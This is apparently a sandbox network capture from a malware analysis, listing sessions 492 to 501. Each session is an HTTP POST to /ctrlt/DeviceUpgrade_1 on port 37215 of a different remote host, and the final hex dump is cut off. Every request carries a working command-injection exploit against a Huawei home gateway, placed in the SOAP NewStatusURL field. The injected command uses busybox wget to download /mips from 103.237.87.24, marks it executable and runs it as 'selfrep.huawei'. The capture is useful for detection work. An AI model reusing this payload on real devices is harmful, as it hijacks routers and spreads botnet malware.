                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  492192.168.2.134130841.29.217.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118297100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  493192.168.2.134916841.33.107.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118298054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  494192.168.2.1351146197.18.26.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118304968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  495192.168.2.1358564139.34.240.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118325949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  496192.168.2.1354318157.53.193.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118335009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  497192.168.2.134783841.145.246.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118360043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  498192.168.2.134510041.224.114.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118360043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  499192.168.2.1349818159.118.166.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118379116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  500192.168.2.135189873.194.199.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118387938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  501192.168.2.133462041.49.104.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118405104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 